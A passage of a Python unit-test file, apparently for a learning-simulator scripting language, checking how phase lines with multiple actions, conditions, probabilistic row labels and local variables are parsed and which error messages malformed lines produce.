stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(7):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': i + 2, 'x2': 2})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertIsNone(stimulus)
def test_multiple_actions3(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | count_line(b1)=5: x1=10, x2=10, B | A
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 10, 'x2': 10})
def test_multiple_actions4(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | x1=x1+1, count(b1)=6: x1=42, x2=2.5, B | C
B e2 | A
C e3 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 0})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 0})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 3, 'x2': 0})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 3, 'x2': 0})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 0})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 5, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 5, 'x2': 0})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 42, 'x2': 2.5})
def test_multiple_actions_error1(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | x1=1, x2=2, B,A(1.1)
B e2 | A
C e3 | A
'''
msg = "Error on line 7: Invalid condition 'B,A(1.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_multiple_actions_error2(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | p1:1, p2:2, B(1.1),A(1.1)
B e2 | A
C e3 | A
'''
msg = "Error on line 7: Invalid condition 'B(1.1),A(1.1)'. Expected a probability, got '1.1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_multiple_actions_error3(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | blaj1 blaj2 = blaj3 blaj4: x1:1, x2:2, B
B e2 | A
C e3 | A
'''
msg = "Error on line 7: Error in expression 'blaj1 blaj2 == blaj3 blaj4': invalid syntax."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_multiple_actions_error4(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
@PHASE phase_label stop:e1=100
S | x1 = 0, x2 = 0, A
A e1 | B | C
B e2 | A
C e3 | A
'''
msg = "Error on line 7: The unconditional goto row label 'B' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
# b1==5 should raise error
# def test_multiple_actions_error5(self):
# text = '''
# behaviors : b1, b2
# stimulus_elements : e1, e2, e3
# @PHASE phase_label stop:e1=100
# S | x1 = 0, x2 = 0, A
# A e1 | b1=5: x1:1, x2:2, B | C # Should give error
# B e2 | A
# C e3 | A
# '''
# phase = parse(text, 'phase_label')
class TestMultipleActions(LsTestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_small1(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'p1': 1, 'p2': 2})
def test_small2(self):
text = '''
behaviors : b1
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | b1: x1=1, x2=2, B | A
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
def test_small3(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | count(e2)==3: x1=1, x2=2, A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 2})
def test_split_with_function_comma1(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), count(b1)=5: x2:42, B | C
B e2 | A
C e1 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertTrue('x1' in phase.local_variables.values)
self.assertTrue('x2' in phase.local_variables.values)
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 1, 'x2': 42})
def test_split_with_function_comma2(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2, e3
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:choice(11,12), count(b1)=5: x2:choice([5,6],[1,2]), B | C
B e2 | A
C e3 | x3:choice(20,22,24), A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, dict())
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertTrue('x1' in phase.local_variables.values)
self.assertTrue('x2' in phase.local_variables.values)
self.assertTrue('x3' not in phase.local_variables.values)
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values['x1'], 1)
self.assertTrue(phase.local_variables.values['x2'] in (11, 12))
self.assertTrue(phase.local_variables.values['x3'] in (20, 22, 24))
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e3': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values['x1'], 1)
self.assertTrue(phase.local_variables.values['x2'] in (5, 6))
self.assertTrue(phase.local_variables.values['x3'] in (20, 22, 24))
def test_prob_goto_without_else(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.1) | C
B e2 | A
C e1 | A
@run phase_label runlabel:foo
'''
run(text)
def test_set_and_use_variable_on_same_line1(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, p1=42: A | B
B e2 | A
@run phase_label runlabel:foo
'''
script_obj, script_output = run(text)
history = script_output.run_outputs['foo'].output_subjects[0].history
self.assertEqual(history[::2], ['e1', 'e2'] * 9 + ['e1'])
def test_set_and_use_variable_on_same_line2(self):
text = '''
n_subjects : 1
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=10
A e1 | p1:142, p2:2, p1=142: A | B
B e2 | A
@run phase_label runlabel:foo
'''
script_obj, script_output = run(text)
history = script_output.run_outputs['foo'].output_subjects[0].history
self.assertEqual(history[::2], ['e1'] * 10)
def test_response_in_condition(self):
text = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | b1: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
# text = '''
# behaviors : b1, b2
# stimulus_elements : e1, e2
# mechanism : sr
# @PHASE phase_label stop:e2=10
# A e1 | b1 and 1==1: A | B
# B e2 | A
# '''
# phase = parse(text, 'phase_label')
# stimulus = phase.next_stimulus(None)[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b1')[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b1')[0]
# self.assertTrue(stimulus == {'e1': 1})
# stimulus = phase.next_stimulus('b2')[0]
# self.assertTrue(stimulus == {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | b1 or b2: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | (b1 or b2) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2) ) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2 and [1,2,3]==[1,2,3]) ) and count(e2)==0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | ([1,2,3]==[1,2,3]): A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2'])
stimulus = phase.next_stimulus(response)[0]
self.assertEqual(stimulus, {'e1': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, None)
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and count_line(b2)>0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and b2>0: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | b1 and b2: A | B
B e2 | A
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
for i in range(100):
response = choice(['b1', 'b2', 'b3'])
stimulus = phase.next_stimulus(response)[0]
if i % 2:
self.assertEqual(stimulus, {'e1': 1})
else:
self.assertEqual(stimulus, {'e2': 1})
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e1=101
A e1 | [1,2,3]==[1,2,3]: A | B
B e2 | A
'''
msg = "Error on line 7: Unknown action '[1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = '''
behaviors : b1, b2, b3
stimulus_elements : e1, e2
mechanism : sr
@PHASE phase_label stop:e2=10
A e1 | ( b1 or (b2 or {'a':1}=={'a':1}) ) : A | B
B e2 | A
'''
msg = "Error on line 7: Invalid statement '( b1 or (b2 or {'a':1}=={'a':1}) ) : A'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_conditional_and_unconditional_actions(self):
params = '''
behaviors : b1, b2, b3
stimulus_elements : e0, e1, e2, e3
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=1, x2=2, b1: x1=x1+1, x2=x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
phase = parse(text, 'phase_label')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 0, 'x2': 0})
for _ in range(42):
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e1': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 3})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 2, 'x2': 3})
for _ in range(42):
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e2': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 4})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 4, 'x2': 4})
for _ in range(42):
stimulus = phase.next_stimulus('b3')[0]
self.assertEqual(stimulus, {'e3': 1})
self.assertEqual(phase.local_variables.values, {'x1': 33, 'x2': 4})
stimulus = phase.next_stimulus(choice(['b1', 'b2', 'b3']))[0]
self.assertEqual(stimulus, {'e0': 1})
self.assertEqual(phase.local_variables.values, {'x1': 33, 'x2': 4})
def test_conditional_and_unconditional_actions_exceptions(self):
params = '''
behaviors : b1, b2, b3
stimulus_elements : e0, e1, e2, e3
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2=0, b1: x1=x1+1, x2=x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2=0, b1: x1=x1+1, x2=x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2:0, b1: x1=x1+1, x2:x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2:0, b1: x1=x1+1, x2:x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1==0: x2:0, b1: x1:x1+1, x2:x2+1, E1 | x1 = x1+2, x2=x2+2, b2: x1=x1+1, E2 | x1=33, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Multiple conditions ('x1==0' and 'b1') found in 'x1==0: x2:0, b1: x1:x1+1, x2:x2+1, E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1=x1+1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1=x1+1, E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | b1: x1=0, x2=0, E1, x1=x1+1, E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Row label(s) must be the last action(s). Found 'x1=x1+1' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: The unconditional goto row label 'E1' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, E2, E3 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: The unconditional goto row label 'E1,E2,E3' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, E2, E3
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Invalid condition 'E1,E2,E3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, x1=x1+1 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Last action must be a row label, found 'x1=x1+1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1, x1==5: E2 | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Found condition 'x1==5' after row label 'E1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:False
S | x1 = 0, x2 = 0, E0
E0 e0 | x1=0, x2=0, E1(0.1), x1==5: E2(0.9) | E0
E1 e1 | E0
E2 e2 | E0
E3 e3 | E0
'''
msg = "Error on line 9: Found condition 'x1==5' after row label 'E1(0.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_exceptions(self):
params = '''
behaviors : b1, b2
stimulus_elements : e1, e2
mechanism : sr
'''
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B,A(1.1)
B e2 | A
'''
msg = "Error on line 8: Invalid condition 'B,A(1.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | p1:1, p2:2, B(1.1),A(1.1)
B e2 | A
'''
msg = "Error on line 8: Invalid condition 'B(1.1),A(1.1)'. Expected a probability, got '1.1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1: x1:1, x2:2, B # Missing else
B e2 | A
@run phase_label
'''
msg = "No condition in 'b1: x1:1, x2:2, B' was met for response 'b2'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1 b2 = x3 x4: x1:1, x2:2, B
B e2 | A
@run phase_label
'''
msg = "Error on line 8: Error in expression 'b1 b2 == x3 x4': invalid syntax."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | B | C
B e2 | A
C e1 | A
'''
msg = "Error on line 8: The unconditional goto row label 'B' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | x1:1, b1&5: x2:2, B | C
B e2 | A
C e1 | A
@run phase_label
'''
msg = "Error on line 8: Condition 'b1&5' is not a boolean expression."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | x1::1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'x1::1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | foo:bar:1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'foo:bar:1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | foo:bar:baz:1, x2:2, B
B e2 | A
'''
msg = "Error on line 8: Invalid statement 'foo:bar:baz:1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | b1:B | A
B e2 | A
'''
msg = "Error on line 8: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
S | x:0, A
A | b1+cos(x)==2 and x==0:B | A
B e2 | A
'''
msg = "Error on line 9: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
S | x:0, A
A | count(b1)==2 or x==0:B | A # Is actually ok, but we should
# phase out count(), so never mind
B e2 | A
'''
msg = "Error on line 9: Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x1:1, x2:2, B, x3:3 | A
B e2 | A
'''
msg = "Error on line 8: Row label(s) must be the last action(s). Found 'x3:3' after row-label."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x0:0, x1:1, x2:2, x3:3 | A
B e2 | A
'''
msg = "Error on line 8: Last action must be a row label, found 'x3:3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1=6: x1:1, x2:2, x3:3
B e2 | A
'''
msg = "Last action must be a row label, found 'x3:3'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | e1=1: 1x:1, B
B e2 | A
'''
msg = "Error on line 8: Variable name '1x' is not a valid identifier."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A | x==2:1, B
B e2 | A
'''
msg = "Unknown action '1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | b1:1, B
B e2 | A
'''
msg = "Error on line 8: Unknown action '1'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@PHASE phase_label stop:e1=10
A e1 | e2:1, B
B e2 | A
'''
msg = "Error on line 8: Variable name 'e2' equals a stimulus element name."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, glob:1, x2:2, B
B e2 | A
'''
msg = "Error on line 9: Cannot modify global variable inside a phase."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
